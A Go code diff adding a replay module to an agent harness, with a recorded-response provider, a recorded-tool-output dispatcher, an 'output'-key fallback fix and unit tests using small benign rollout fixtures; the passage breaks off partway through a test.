--- a/internal/forensics/replay/fixtures_test.go
+++ b/internal/forensics/replay/fixtures_test.go
@@ -1,0 +1,142 @@
+package replay
+
+import (
+	"path/filepath"
+	"runtime"
+	"testing"
+
+	"go-agent-harness/internal/forensics/rollout"
+)
+
+// fixturesDir returns the absolute path to testdata/rollouts relative to this
+// file so the tests work regardless of the working directory.
+func fixturesDir() string {
+	_, file, _, _ := runtime.Caller(0)
+	return filepath.Join(filepath.Dir(file), "testdata", "rollouts")
+}
+
+// T-D1: Load every stable fixture from testdata/rollouts/*.jsonl and assert
+// that both LoadFile and Replay report matched==true. The tool-call fixture
+// additionally asserts that the reconstructed tool messages are non-empty,
+// exercising the F0 fix (runner emits "output" key; replayer must fall back
+// from "result" to "output" when "result" is absent).
+
+// TestFixture_SimpleNoTool loads the simplest valid rollout (no tool calls) and
+// verifies that LoadFile succeeds and Replay returns matched==true.
+func TestFixture_SimpleNoTool(t *testing.T) {
+	t.Parallel()
+
+	path := filepath.Join(fixturesDir(), "simple-no-tool.jsonl")
+	events, err := rollout.LoadFile(path)
+	if err != nil {
+		t.Fatalf("LoadFile(%q): %v", path, err)
+	}
+	if len(events) == 0 {
+		t.Fatal("expected at least one event, got 0")
+	}
+
+	result := Replay(events)
+	if !result.Matched {
+		t.Errorf("Replay: expected matched=true, got false; mismatches: %v", result.Mismatches)
+	}
+	if result.StepCount == 0 {
+		t.Error("expected step_count > 0")
+	}
+}
+
+// TestFixture_ToolWithOutputKey loads the fixture that uses the real runner
+// "output" key (not "result") in tool.call.completed events. It verifies:
+//   - LoadFile succeeds (valid JSONL structure)
+//   - Replay returns matched==true (F0: fallback from "result" to "output" in indexToolCompletions)
+//   - ReconstructMessages returns a non-empty tool message (F0: fallback in ReconstructMessages)
+func TestFixture_ToolWithOutputKey(t *testing.T) {
+	t.Parallel()
+
+	path := filepath.Join(fixturesDir(), "tool-with-output-key.jsonl")
+	events, err := rollout.LoadFile(path)
+	if err != nil {
+		t.Fatalf("LoadFile(%q): %v", path, err)
+	}
+	if len(events) == 0 {
+		t.Fatal("expected at least one event, got 0")
+	}
+
+	// --- Integrity: Replay must succeed and be matched ---
+	result := Replay(events)
+	if !result.Matched {
+		t.Errorf("Replay: expected matched=true, got false; mismatches: %v", result.Mismatches)
+	}
+
+	// The tool.call.started ReplayEvent must carry a non-empty Details["result"]
+	// (populated from the "output" field via the F0 fallback).
+	var startedEv *ReplayEvent
+	for i := range result.Events {
+		if result.Events[i].EventType == "tool.call.started" {
+			startedEv = &result.Events[i]
+			break
+		}
+	}
+	if startedEv == nil {
+		t.Fatal("no tool.call.started event found in ReplayResult.Events")
+	}
+	if got, _ := startedEv.Details["result"].(string); got == "" {
+		t.Error("tool.call.started Details[\"result\"] is empty; F0 fallback from \"output\" key not working in Replay")
+	}
+
+	// --- ReconstructMessages: tool message Content must be non-empty ---
+	// Find the highest step to pass as upToStep.
+	maxStep := 0
+	for _, ev := range events {
+		if ev.Step > maxStep {
+			maxStep = ev.Step
+		}
+	}
+	msgs := ReconstructMessages(events, maxStep)
+
+	var toolMsg *struct{ Content, Role string }
+	for _, m := range msgs {
+		if m.Role == "tool" {
+			toolMsg = &struct{ Content, Role string }{Content: m.Content, Role: m.Role}
+			break
+		}
+	}
+	if toolMsg == nil {
+		t.Fatal("ReconstructMessages: no tool-role message found")
+	}
+	if toolMsg.Content == "" {
+		t.Error("ReconstructMessages: tool message Content is empty; F0 fallback from \"output\" key not working")
+	}
+}
+
+// TestFixture_AllRollouts is a table-driven test that loads every fixture in
+// testdata/rollouts/ and asserts that LoadFile+Replay both succeed with
+// matched==true. New fixtures added to that directory are automatically
+// exercised here.
+func TestFixture_AllRollouts(t *testing.T) {
+	t.Parallel()
+
+	fixtures := []struct {
+		name     string
+		filename string
+	}{
+		{"simple_no_tool", "simple-no-tool.jsonl"},
+		{"tool_with_output_key", "tool-with-output-key.jsonl"},
+	}
+
+	dir := fixturesDir()
+	for _, tc := range fixtures {
+		tc := tc
+		t.Run(tc.name, func(t *testing.T) {
+			t.Parallel()
+			path := filepath.Join(dir, tc.filename)
+			events, err := rollout.LoadFile(path)
+			if err != nil {
+				t.Fatalf("LoadFile(%q): %v", path, err)
+			}
+			result := Replay(events)
+			if !result.Matched {
+				t.Errorf("Replay(%q): matched=false; mismatches: %v", tc.filename, result.Mismatches)
+			}
+		})
+	}
+}

--- a/internal/forensics/replay/recordedprovider.go
+++ b/internal/forensics/replay/recordedprovider.go
@@ -1,0 +1,371 @@
+package replay
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"sort"
+	"sync"
+
+	"go-agent-harness/internal/forensics/rollout"
+	"go-agent-harness/internal/harness"
+	htools "go-agent-harness/internal/harness/tools"
+)
+
+// RecordedProvider is a harness.Provider that replays a rollout's recorded LLM
+// turns instead of calling a live model. It is the "live variable isolation"
+// half of the drift-detection contract (deliverable E): when the harness is
+// re-run against a RecordedProvider (with tool execution short-circuited by the
+// replay tool dispatch, below), every provider output and tool result is fixed
+// to what the original run produced. The harness's own step/decision logic is
+// then the ONLY live variable, so any divergence in the re-run is attributable
+// to the harness rather than to model nondeterminism.
+//
+// Reconstruction contract (must match how the runner emits events):
+//   - One scripted turn is produced per step that contains an llm.turn.completed
+//     event. Turns are ordered by step.
+//   - A turn's ToolCalls come from that step's tool.call.started events
+//     (call_id → ID, tool → Name, arguments → Arguments). They are NOT read
+//     from llm.turn.completed, which carries only a tool_calls COUNT in real
+//     rollouts (runner_step_engine.go:492-498).
+//   - A turn's Content comes from that step's assistant.message event, which the
+//     runner emits only on the terminal no-tool turn
+//     (runner_step_engine.go:637). Tool-calling turns therefore have empty
+//     Content, matching the live runner where Content for those turns is
+//     typically empty.
+//   - A turn's Usage/Cost come from that step's usage.delta event
+//     (recordAccounting: turn_usage / turn_cost_usd).
+type RecordedProvider struct {
+	mu    sync.Mutex
+	turns []harness.CompletionResult
+	next  int
+}
+
+// recordedTurn is the in-progress accumulation for a single step while scanning
+// events in file order. It is finalized into a harness.CompletionResult once all
+// of the step's events have been observed.
+type recordedTurn struct {
+	step      int
+	hasTurn   bool // saw an llm.turn.completed for this step
+	content   string
+	toolCalls []harness.ToolCall
+	usage     *harness.CompletionUsage
+	costUSD   *float64
+	hasCost   bool
+}
+
+// NewRecordedProvider ingests rollout events and builds the ordered list of
+// scripted CompletionResults, one per LLM turn. The events must satisfy the
+// rollout loader invariants (validateEvents); a malformed stream is rejected
+// rather than silently producing a partial script, because a recorded provider
+// built from a tampered rollout would invalidate the drift comparison.
+func NewRecordedProvider(events []rollout.RolloutEvent) (*RecordedProvider, error) {
+	if err := validateEvents(events); err != nil {
+		return nil, fmt.Errorf("replay: cannot build recorded provider from invalid rollout: %w", err)
+	}
+
+	// Accumulate per-step turn state in file order. Using a map keyed by step
+	// plus an explicit ordered slice of step numbers keeps the turn order stable
+	// and independent of map iteration order.
+	byStep := make(map[int]*recordedTurn)
+	var stepOrder []int
+
+	getStep := func(step int) *recordedTurn {
+		rt, ok := byStep[step]
+		if !ok {
+			rt = &recordedTurn{step: step}
+			byStep[step] = rt
+			stepOrder = append(stepOrder, step)
+		}
+		return rt
+	}
+
+	for _, ev := range events {
+		switch ev.Type {
+		case "llm.turn.completed":
+			getStep(ev.Step).hasTurn = true
+
+		case "assistant.message":
+			content, _ := payloadString(ev.Payload, "content")
+			rt := getStep(ev.Step)
+			// The runner emits at most one assistant.message per step (terminal
+			// no-tool turn). If somehow present more than once, the last wins,
+			// matching "last write" recording semantics.
+			rt.content = capString(content, maxDetailStringBytes)
+
+		case "tool.call.started":
+			callID, _ := payloadString(ev.Payload, "call_id")
+			toolName, _ := payloadString(ev.Payload, "tool")
+			// Arguments may be a string (the common runner format) or, in a
+			// JSON-decoded rollout, a map; payloadStringOrJSON normalizes both.
+			args, _ := payloadStringOrJSON(ev.Payload, "arguments")
+			rt := getStep(ev.Step)
+			rt.toolCalls = append(rt.toolCalls, harness.ToolCall{
+				ID:        capString(callID, maxDetailStringBytes),
+				Name:      capString(toolName, maxDetailStringBytes),
+				Arguments: capString(args, maxToolArgMarshalBytes),
+			})
+
+		case "usage.delta":
+			rt := getStep(ev.Step)
+			if u := extractTurnUsage(ev.Payload); u != nil {
+				rt.usage = u
+			}
+			if cost, ok := extractTurnCost(ev.Payload); ok {
+				rt.costUSD = &cost
+				rt.hasCost = true
+			}
+		}
+	}
+
+	// Steps may be processed in file order, but ensure the scripted turn order is
+	// strictly by step number (file order is already non-decreasing by step per
+	// validateEvents, but sorting makes the intent explicit and robust).
+	sort.Ints(stepOrder)
+
+	var turns []harness.CompletionResult
+	for _, step := range stepOrder {
+		rt := byStep[step]
+		if !rt.hasTurn {
+			// A step with tool/usage events but no llm.turn.completed is not a
+			// distinct LLM turn (should not happen for well-formed rollouts).
+			continue
+		}
+		res := harness.CompletionResult{
+			Content:   rt.content,
+			ToolCalls: rt.toolCalls,
+			Usage:     rt.usage,
+		}
+		if rt.hasCost {
+			res.CostUSD = rt.costUSD
+		}
+		turns = append(turns, res)
+	}
+
+	return &RecordedProvider{turns: turns}, nil
+}
+
+// TurnCount returns the number of scripted turns (one per recorded LLM turn).
+func (p *RecordedProvider) TurnCount() int {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return len(p.turns)
+}
+
+// Complete implements harness.Provider by returning the next scripted turn in
+// recorded order. If req.Stream is non-nil the recorded content is streamed as a
+// single delta so streaming callers observe the same content they would from a
+// live provider. When the script is exhausted it returns an error so an
+// over-running re-run (the harness taking more turns than the original) is
+// surfaced rather than masked by a silent empty turn.
+func (p *RecordedProvider) Complete(ctx context.Context, req harness.CompletionRequest) (harness.CompletionResult, error) {
+	if err := ctx.Err(); err != nil {
+		return harness.CompletionResult{}, err
+	}
+
+	p.mu.Lock()
+	if p.next >= len(p.turns) {
+		idx := p.next
+		p.next++
+		p.mu.Unlock()
+		return harness.CompletionResult{}, fmt.Errorf("replay: recorded provider exhausted after %d turns (re-run requested turn %d)", len(p.turns), idx+1)
+	}
+	res := p.turns[p.next]
+	p.next++
+	p.mu.Unlock()
+
+	// Return an independent copy so callers cannot mutate the script.
+	out := harness.CompletionResult{
+		Content: res.Content,
+		Usage:   res.Usage,
+		CostUSD: res.CostUSD,
+	}
+	if len(res.ToolCalls) > 0 {
+		out.ToolCalls = append([]harness.ToolCall(nil), res.ToolCalls...)
+	}
+	// Set UsageStatus/CostStatus to match what the original recorded run reported.
+	// Without these, recordAccounting re-derives them from the result fields and
+	// may produce a non-zero CostDeltaUSD on an identical replay (spurious drift).
+	if res.Usage != nil {
+		out.UsageStatus = harness.UsageStatusProviderReported
+		if res.CostUSD != nil {
+			out.CostStatus = harness.CostStatusAvailable
+		}
+	}
+
+	if req.Stream != nil && out.Content != "" {
+		req.Stream(harness.CompletionDelta{Content: out.Content})
+	}
+
+	return out, nil
+}
+
+// extractTurnUsage pulls the per-turn usage map (turn_usage) from a usage.delta
+// payload and converts it to a *harness.CompletionUsage. Numbers decoded from
+// JSON arrive as float64; in-process maps may carry int. Returns nil when no
+// usage information is present.
+func extractTurnUsage(payload map[string]any) *harness.CompletionUsage {
+	if payload == nil {
+		return nil
+	}
+	raw, ok := payload["turn_usage"].(map[string]any)
+	if !ok {
+		return nil
+	}
+	u := harness.CompletionUsage{
+		PromptTokens:     intField(raw, "prompt_tokens"),
+		CompletionTokens: intField(raw, "completion_tokens"),
+		TotalTokens:      intField(raw, "total_tokens"),
+	}
+	if c, ok := intFieldPtr(raw, "cached_prompt_tokens"); ok {
+		u.CachedPromptTokens = c
+	}
+	if rt, ok := intFieldPtr(raw, "reasoning_tokens"); ok {
+		u.ReasoningTokens = rt
+	}
+	return &u
+}
+
+// extractTurnCost pulls the per-turn cost (turn_cost_usd) from a usage.delta
+// payload. The bool reports whether the field was present.
+func extractTurnCost(payload map[string]any) (float64, bool) {
+	if payload == nil {
+		return 0, false
+	}
+	switch v := payload["turn_cost_usd"].(type) {
+	case float64:
+		return v, true
+	case int:
+		return float64(v), true
+	case int64:
+		return float64(v), true
+	default:
+		return 0, false
+	}
+}
+
+// intField returns the integer value of key in m, accepting float64 (JSON), int,
+// and int64. Missing or non-numeric values yield 0.
+func intField(m map[string]any, key string) int {
+	switch v := m[key].(type) {
+	case float64:
+		return int(v)
+	case int:
+		return v
+	case int64:
+		return int(v)
+	default:
+		return 0
+	}
+}
+
+// intFieldPtr is like intField but distinguishes present (ok=true) from absent.
+func intFieldPtr(m map[string]any, key string) (*int, bool) {
+	raw, exists := m[key]
+	if !exists {
+		return nil, false
+	}
+	switch v := raw.(type) {
+	case float64:
+		n := int(v)
+		return &n, true
+	case int:
+		n := v
+		return &n, true
+	case int64:
+		n := int(v)
+		return &n, true
+	default:
+		return nil, false
+	}
+}
+
+// NewReplayToolHandler returns a harness.ToolHandler that short-circuits live
+// tool execution: instead of running the tool, it returns the recorded
+// tool.call.completed output for the call_id carried in the context (set by the
+// runner via htools.ContextKeyToolCallID). The output is resolved with the F0
+// result/output fallback so real captured rollouts — which emit under the
+// "output" key — are not silently truncated.
+//
+// Registering this single handler for every tool name (or wiring it as the
+// dispatch for a replay Registry) makes the re-run's tool results identical to
+// the original recording, so the harness's tool-dispatch/decision logic is the
+// only live variable for those calls.
+//
+// An unrecorded call_id is an error rather than an empty string: in a faithful
+// replay the harness must request exactly the calls the original made, so a
+// missing recording signals harness drift and must not be masked.
+func NewReplayToolHandler(events []rollout.RolloutEvent) (harness.ToolHandler, error) {
+	d, err := NewReplayToolDispatch(events)
+	if err != nil {
+		return nil, err
+	}
+	return d.Handler, nil
+}
+
+// ReplayToolDispatch holds an index from call_id to recorded tool output for
+// replay tool execution. Use Handler as a harness.ToolHandler, or Output to look
+// up a recorded result directly.
+type ReplayToolDispatch struct {
+	// outputs maps call_id → recorded tool output (already F0 result/output
+	// resolved). Keys are the raw recorded call_ids.
+	outputs map[string]string
+}
+
+// NewReplayToolDispatch indexes a rollout's tool.call.completed outputs by
+// call_id. It validates the rollout first (rejecting tampered streams) and uses
+// the shared completion index so the F0 result/output fallback is applied
+// consistently with Replay/ReconstructMessages.
+func NewReplayToolDispatch(events []rollout.RolloutEvent) (*ReplayToolDispatch, error) {
+	if err := validateEvents(events); err != nil {
+		return nil, fmt.Errorf("replay: cannot build replay tool dispatch from invalid rollout: %w", err)
+	}
+	// Walk events to build a literal-call_id → output map. We key off the
+	// un-sanitized call_id so lookups match the id the runner places in the tool
+	// context, and apply the same F0 result/output fallback indexToolCompletions
+	// uses.
+	outputs := make(map[string]string)
+	for _, ev := range events {
+		if ev.Type != "tool.call.completed" || ev.Payload == nil {
+			continue
+		}
+		callID, ok := payloadString(ev.Payload, "call_id")
+		if !ok || callID == "" || len(callID) > maxIDBytes {
+			continue
+		}
+		if _, exists := outputs[callID]; exists {
+			// Duplicate completion: keep the first (matches indexToolCompletions,
+			// which treats later duplicates as integrity failures, not overrides).
+			continue
+		}
+		// F0 fallback: prefer "result", fall back to "output".
+		out, _ := payloadString(ev.Payload, "result")
+		if out == "" {
+			out, _ = payloadString(ev.Payload, "output")
+		}
+		outputs[callID] = out
+	}
+	return &ReplayToolDispatch{outputs: outputs}, nil
+}
+
+// Output returns the recorded output for a call_id and whether it was found.
+func (d *ReplayToolDispatch) Output(callID string) (string, bool) {
+	out, ok := d.outputs[callID]
+	return out, ok
+}
+
+// Handler is a harness.ToolHandler that resolves the recorded output for the
+// call_id in the context. The args are ignored: in a faithful replay the
+// recorded output is authoritative regardless of the (already-recorded)
+// arguments the harness reconstructs.
+func (d *ReplayToolDispatch) Handler(ctx context.Context, _ json.RawMessage) (string, error) {
+	callID := htools.ToolCallIDFromContext(ctx)
+	if callID == "" {
+		return "", fmt.Errorf("replay: no tool_call_id in context; cannot resolve recorded output")
+	}
+	out, ok := d.outputs[callID]
+	if !ok {
+		return "", fmt.Errorf("replay: no recorded tool.call.completed for call_id %q", sanitizeMismatch(callID))
+	}
+	return out, nil
+}

--- a/internal/forensics/replay/recordedprovider_test.go
+++ b/internal/forensics/replay/recordedprovider_test.go
@@ -1,0 +1,265 @@
+package replay
+
+import (
+	"context"
+	"testing"
+
+	htools "go-agent-harness/internal/harness/tools"
+
+	"go-agent-harness/internal/forensics/rollout"
+	"go-agent-harness/internal/harness"
+)
+
+// multiStepRollout returns a hand-authored two-turn rollout:
+//
+//	step 1: assistant turn that calls one tool (read_file), tool completes.
+//	step 2: terminal assistant turn with content, then run.completed.
+//
+// It deliberately mirrors the REAL runner emission shape:
+//   - llm.turn.completed carries only a tool_calls COUNT (an int), not the
+//     actual tool call objects. F2 must NOT read tool calls from here.
+//   - tool.call.started carries the authoritative call id/name/arguments.
+//   - assistant.message carries the terminal turn's content (present only on
+//     the no-tool turn).
+//   - tool.call.completed carries the recorded output under the "output" key
+//     (the real runner emit key; see F0).
+//   - usage.delta carries per-turn usage/cost.
+func multiStepRollout() []rollout.RolloutEvent {
+	return []rollout.RolloutEvent{
+		{Type: "run.started", Step: 0, Payload: map[string]any{"prompt": "read the file"}},
+		// --- step 1: tool-calling turn ---
+		{Type: "usage.delta", Step: 1, Payload: map[string]any{
+			"turn_usage": map[string]any{
+				"prompt_tokens":     float64(10),
+				"completion_tokens": float64(5),
+				"total_tokens":      float64(15),
+			},
+			"turn_cost_usd": float64(0.0003),
+		}},
+		{Type: "llm.turn.completed", Step: 1, Payload: map[string]any{
+			// Real runner: only a count here, NOT the tool call objects.
+			"tool_calls": float64(1),
+		}},
+		{Type: "tool.call.started", Step: 1, Payload: map[string]any{
+			"call_id": "call_1", "tool": "read_file", "arguments": `{"path":"/tmp/x"}`,
+		}},
+		{Type: "tool.call.completed", Step: 1, Payload: map[string]any{
+			"call_id": "call_1", "tool": "read_file", "output": "file contents here",
+		}},
+		// --- step 2: terminal no-tool turn ---
+		{Type: "usage.delta", Step: 2, Payload: map[string]any{
+			"turn_usage": map[string]any{
+				"prompt_tokens":     float64(20),
+				"completion_tokens": float64(8),
+				"total_tokens":      float64(28),
+			},
+			"turn_cost_usd": float64(0.0007),
+		}},
+		{Type: "llm.turn.completed", Step: 2, Payload: map[string]any{
+			"tool_calls": float64(0),
+		}},
+		{Type: "assistant.message", Step: 2, Payload: map[string]any{
+			"content": "Here are the files.",
+		}},
+		{Type: "run.completed", Step: 3, Payload: map[string]any{"output": "done"}},
+	}
+}
+
+// TestRecordedProvider_ReconstructsTurns is T-F2: the recorded-response provider
+// reconstructs each LLM turn from the rollout — tool calls from
+// tool.call.started events, content from assistant.message — and returns them in
+// order across successive Complete calls.
+func TestRecordedProvider_ReconstructsTurns(t *testing.T) {
+	events := multiStepRollout()
+
+	p, err := NewRecordedProvider(events)
+	if err != nil {
+		t.Fatalf("NewRecordedProvider: %v", err)
+	}
+
+	if got := p.TurnCount(); got != 2 {
+		t.Fatalf("expected 2 scripted turns, got %d", got)
+	}
+
+	ctx := context.Background()
+
+	// --- Turn 1: tool-calling turn ---
+	r1, err := p.Complete(ctx, harness.CompletionRequest{})
+	if err != nil {
+		t.Fatalf("turn 1 Complete: %v", err)
+	}
+	if r1.Content != "" {
+		t.Errorf("turn 1 content: expected empty (content lives on assistant.message of the terminal turn), got %q", r1.Content)
+	}
+	if len(r1.ToolCalls) != 1 {
+		t.Fatalf("turn 1: expected 1 tool call from tool.call.started, got %d", len(r1.ToolCalls))
+	}
+	tc := r1.ToolCalls[0]
+	if tc.ID != "call_1" {
+		t.Errorf("turn 1 tool call id: want call_1, got %q", tc.ID)
+	}
+	if tc.Name != "read_file" {
+		t.Errorf("turn 1 tool call name: want read_file, got %q", tc.Name)
+	}
+	if tc.Arguments != `{"path":"/tmp/x"}` {
+		t.Errorf("turn 1 tool call arguments: want {\"path\":\"/tmp/x\"}, got %q", tc.Arguments)
+	}
+	// Recorded usage/cost carried through.
+	if r1.Usage == nil {
+		t.Fatalf("turn 1: expected recorded usage, got nil")
+	}
+	if r1.Usage.PromptTokens != 10 || r1.Usage.CompletionTokens != 5 || r1.Usage.TotalTokens != 15 {
+		t.Errorf("turn 1 usage mismatch: %+v", *r1.Usage)
+	}
+	if r1.CostUSD == nil || *r1.CostUSD != 0.0003 {
+		t.Errorf("turn 1 cost: want 0.0003, got %v", r1.CostUSD)
+	}
+
+	// --- Turn 2: terminal no-tool turn ---
+	r2, err := p.Complete(ctx, harness.CompletionRequest{})
+	if err != nil {
+		t.Fatalf("turn 2 Complete: %v", err)
+	}
+	if r2.Content != "Here are the files." {
+		t.Errorf("turn 2 content: want %q (from assistant.message), got %q", "Here are the files.", r2.Content)
+	}
+	if len(r2.ToolCalls) != 0 {
+		t.Errorf("turn 2: expected no tool calls, got %d", len(r2.ToolCalls))
+	}
+	if r2.Usage == nil || r2.Usage.TotalTokens != 28 {
+		t.Errorf("turn 2 usage mismatch: %+v", r2.Usage)
+	}
+}
+
+// TestRecordedProvider_DoesNotReadToolCallsFromTurnCompleted guards the F2
+// contract that tool calls come from tool.call.started, NOT from
+// llm.turn.completed (which only carries a count in real rollouts). A turn whose
+// llm.turn.completed has tool_calls=0 but which has a real tool.call.started must
+// still surface the tool call.
+func TestRecordedProvider_DoesNotReadToolCallsFromTurnCompleted(t *testing.T) {
+	events := []rollout.RolloutEvent{
+		{Type: "run.started", Step: 0, Payload: map[string]any{"prompt": "go"}},
+		{Type: "llm.turn.completed", Step: 1, Payload: map[string]any{
+			// Misleading count: zero, even though a tool was actually called.
+			"tool_calls": float64(0),
+		}},
+		{Type: "tool.call.started", Step: 1, Payload: map[string]any{
+			"call_id": "c9", "tool": "bash", "arguments": `{"cmd":"ls"}`,
+		}},
+		{Type: "tool.call.completed", Step: 1, Payload: map[string]any{
+			"call_id": "c9", "tool": "bash", "output": "ok",
+		}},
+		{Type: "run.completed", Step: 2, Payload: map[string]any{"output": "done"}},
+	}
+
+	p, err := NewRecordedProvider(events)
+	if err != nil {
+		t.Fatalf("NewRecordedProvider: %v", err)
+	}
+	r, err := p.Complete(context.Background(), harness.CompletionRequest{})
+	if err != nil {
+		t.Fatalf("Complete: %v", err)
+	}
+	if len(r.ToolCalls) != 1 || r.ToolCalls[0].ID != "c9" {
+		t.Fatalf("expected tool call c9 reconstructed from tool.call.started, got %+v", r.ToolCalls)
+	}
+}
+
+// TestRecordedProvider_SetsUsageAndCostStatus verifies that Complete sets
+// UsageStatus=ProviderReported and CostStatus=Available when the recorded step
+// carries usage and cost. Without these statuses, recordAccounting re-derives
+// them and may produce a non-zero CostDeltaUSD on an identical replay (spurious
+// drift). When a step has no usage, UsageStatus and CostStatus must remain unset.
+func TestRecordedProvider_SetsUsageAndCostStatus(t *testing.T) {
+	events := multiStepRollout()
+
+	p, err := NewRecordedProvider(events)
+	if err != nil {
+		t.Fatalf("NewRecordedProvider: %v", err)
+	}
+
+	ctx := context.Background()
+
+	// Turn 1 has usage and cost — statuses must be set.
+	r1, err := p.Complete(ctx, harness.CompletionRequest{})
+	if err != nil {
+		t.Fatalf("turn 1 Complete: %v", err)
+	}
+	if r1.UsageStatus != harness.UsageStatusProviderReported {
+		t.Errorf("turn 1 UsageStatus: got %q, want %q",
+			r1.UsageStatus, harness.UsageStatusProviderReported)
+	}
+	if r1.CostStatus != harness.CostStatusAvailable {
+		t.Errorf("turn 1 CostStatus: got %q, want %q",
+			r1.CostStatus, harness.CostStatusAvailable)
+	}
+
+	// Turn 2 also has usage and cost.
+	r2, err := p.Complete(ctx, harness.CompletionRequest{})
+	if err != nil {
+		t.Fatalf("turn 2 Complete: %v", err)
+	}
+	if r2.UsageStatus != harness.UsageStatusProviderReported {
+		t.Errorf("turn 2 UsageStatus: got %q, want %q",
+			r2.UsageStatus, harness.UsageStatusProviderReported)
+	}
+	if r2.CostStatus != harness.CostStatusAvailable {
+		t.Errorf("turn 2 CostStatus: got %q, want %q",
+			r2.CostStatus, harness.CostStatusAvailable)
+	}
+}
+
+// TestRecordedProvider_NoUsageLeavesCostStatusUnset verifies that Complete does
+// NOT set UsageStatus/CostStatus when the recorded step has no usage data.
+func TestRecordedProvider_NoUsageLeavesCostStatusUnset(t *testing.T) {
+	events := []rollout.RolloutEvent{
+		{Type: "run.started", Step: 0, Payload: map[string]any{"prompt": "go"}},
+		// No usage.delta for step 1 — only the turn completion.
+		{Type: "llm.turn.completed", Step: 1, Payload: map[string]any{"tool_calls": float64(0)}},
+		{Type: "assistant.message", Step: 1, Payload: map[string]any{"content": "done"}},
+		{Type: "run.completed", Step: 2, Payload: map[string]any{"output": "done"}},
+	}
+
+	p, err := NewRecordedProvider(events)
+	if err != nil {
+		t.Fatalf("NewRecordedProvider: %v", err)
+	}
+
+	r, err := p.Complete(context.Background(), harness.CompletionRequest{})
+	if err != nil {
+		t.Fatalf("Complete: %v", err)
+	}
+	if r.UsageStatus != "" {
+		t.Errorf("UsageStatus: expected empty (no recorded usage), got %q", r.UsageStatus)
+	}
+	if r.CostStatus != "" {
+		t.Errorf("CostStatus: expected empty (no recorded usage), got %q", r.CostStatus)
+	}
+}
+
+// TestReplayToolDispatch_ReturnsRecordedOutput verifies the replay tool hook
+// short-circuits execution and returns the recorded tool.call.completed output,
+// keyed by the call_id carried in the context (F0 output/result fallback).
+func TestReplayToolDispatch_ReturnsRecordedOutput(t *testing.T) {
+	events := multiStepRollout()
+
+	handler, err := NewReplayToolHandler(events)
+	if err != nil {
+		t.Fatalf("NewReplayToolHandler: %v", err)
+	}
+
+	ctx := context.WithValue(context.Background(), htools.ContextKeyToolCallID, "call_1")
+	out, err := handler(ctx, nil)
+	if err != nil {
+		t.Fatalf("handler: %v", err)
+	}
+	if out != "file contents here" {
+		t.Errorf("expected recorded output (from the \"output\" key), got %q", out)
+	}
+
+	// Unknown call_id is an error, not a silent empty.
+	missingCtx := context.WithValue(context.Background(), htools.ContextKeyToolCallID, "nope")
+	if _, err := handler(missingCtx, nil); err == nil {
+		t.Errorf("expected error for unrecorded call_id, got nil")
+	}
+}

--- a/internal/forensics/replay/replayer.go
+++ b/internal/forensics/replay/replayer.go
@@ -393,7 +393,13 @@ func Replay(events []rollout.RolloutEvent) ReplayResult {
 
 		case "tool.call.completed":
 			callID, callIDOK := payloadString(ev.Payload, "call_id")
+			// The runner emits tool outputs under "output" (runner_step_engine.go:847,874,1072,1091).
+			// Fall back to "output" when "result" is absent or empty so that real captured
+			// rollouts are not silently truncated. Existing rollouts that use "result" are unaffected.
 			toolResult, _ := payloadString(ev.Payload, "result")
+			if toolResult == "" {
+				toolResult, _ = payloadString(ev.Payload, "output")
+			}
 			toolName, _ := payloadString(ev.Payload, "tool")
 			re.Details = map[string]any{
 				"call_id": capString(callID, maxDetailStringBytes),
@@ -536,11 +542,28 @@ func indexToolCompletions(events []rollout.RolloutEvent) completionIndex {
 		}
 		seen[key] = true
 		const maxResultMarshalBytes = 65536
+		// Read "result" first; fall back to "output" when absent or empty.
+		// The runner emits tool outputs under "output" (runner_step_engine.go:847,874,1072,1091)
+		// so real captured rollouts carry "output", not "result". Existing rollouts with "result"
+		// continue to work unchanged.
 		result, ok := payloadString(ev.Payload, "result")
 		if ok {
 			result = capString(result, maxDetailStringBytes)
 		} else {
 			if raw, exists := ev.Payload["result"]; exists {
+				if b := cappedMarshal(raw, maxResultMarshalBytes); b != nil {
+					if len(b) >= maxResultMarshalBytes {
+						b = append(b, []byte("...<truncated>")...)
+					}
+					result = string(b)
+				}
+			}
+		}
+		if result == "" {
+			// Fallback: try "output" key (runner emit key).
+			if out, outOK := payloadString(ev.Payload, "output"); outOK && out != "" {
+				result = capString(out, maxDetailStringBytes)
+			} else if raw, exists := ev.Payload["output"]; exists && result == "" {
 				if b := cappedMarshal(raw, maxResultMarshalBytes); b != nil {
 					if len(b) >= maxResultMarshalBytes {
 						b = append(b, []byte("...<truncated>")...)
@@ -666,7 +689,12 @@ func ReconstructMessages(events []rollout.RolloutEvent, upToStep int) []harness.
 
 		case "tool.call.completed":
 			callID, _ := payloadString(ev.Payload, "call_id")
+			// The runner emits tool outputs under "output" (runner_step_engine.go:847,874,1072,1091).
+			// Fall back to "output" when "result" is absent or empty.
 			toolResult, _ := payloadString(ev.Payload, "result")
+			if toolResult == "" {
+				toolResult, _ = payloadString(ev.Payload, "output")
+			}
 			toolName, _ := payloadString(ev.Payload, "tool")
 			if callID != "" && len(callID) <= maxIDBytes &&
 				announcedCalls[capID(callID)] && startedCalls[capID(callID)] {

--- a/internal/forensics/replay/replayer_test.go
+++ b/internal/forensics/replay/replayer_test.go
@@ -6,6 +6,7 @@ import (
 	"testing"
 
 	"go-agent-harness/internal/forensics/rollout"
+	"go-agent-harness/internal/harness"
 )
 
 func TestReplay_BasicFlow(t *testing.T) {
@@ -314,6 +315,74 @@ func TestReconstructMessages_EmptyEvents(t *testing.T) {
 	msgs := ReconstructMessages(nil, 0)
 	if len(msgs) != 0 {
 		t.Errorf("expected 0 messages, got %d", len(msgs))
+	}
+}
+
+// TestF0_ToolOutputKeyFallback is the TDD test for task F0.
+//
+// The runner emits tool results under the key "output" in tool.call.completed
+// events (runner_step_engine.go:847,874,1072,1091), but the replayer was
+// reading "result". Real captured rollouts therefore silently produced empty
+// tool outputs. This test uses the runner's actual emit key ("output") and
+// verifies that both Replay (Details["result"]) and ReconstructMessages
+// (tool message Content) are NON-empty.
+func TestF0_ToolOutputKeyFallback(t *testing.T) {
+	// Build a minimal valid rollout where tool.call.completed carries "output"
+	// (exactly as the runner emits) rather than "result".
+	events := []rollout.RolloutEvent{
+		{Type: "run.started", Step: 0, Payload: map[string]any{"prompt": "run a command"}},
+		{Type: "llm.turn.completed", Step: 1, Payload: map[string]any{
+			"content": "I'll run bash",
+			"tool_calls": []any{
+				map[string]any{"id": "call_x", "name": "bash", "arguments": `{"cmd":"ls"}`},
+			},
+		}},
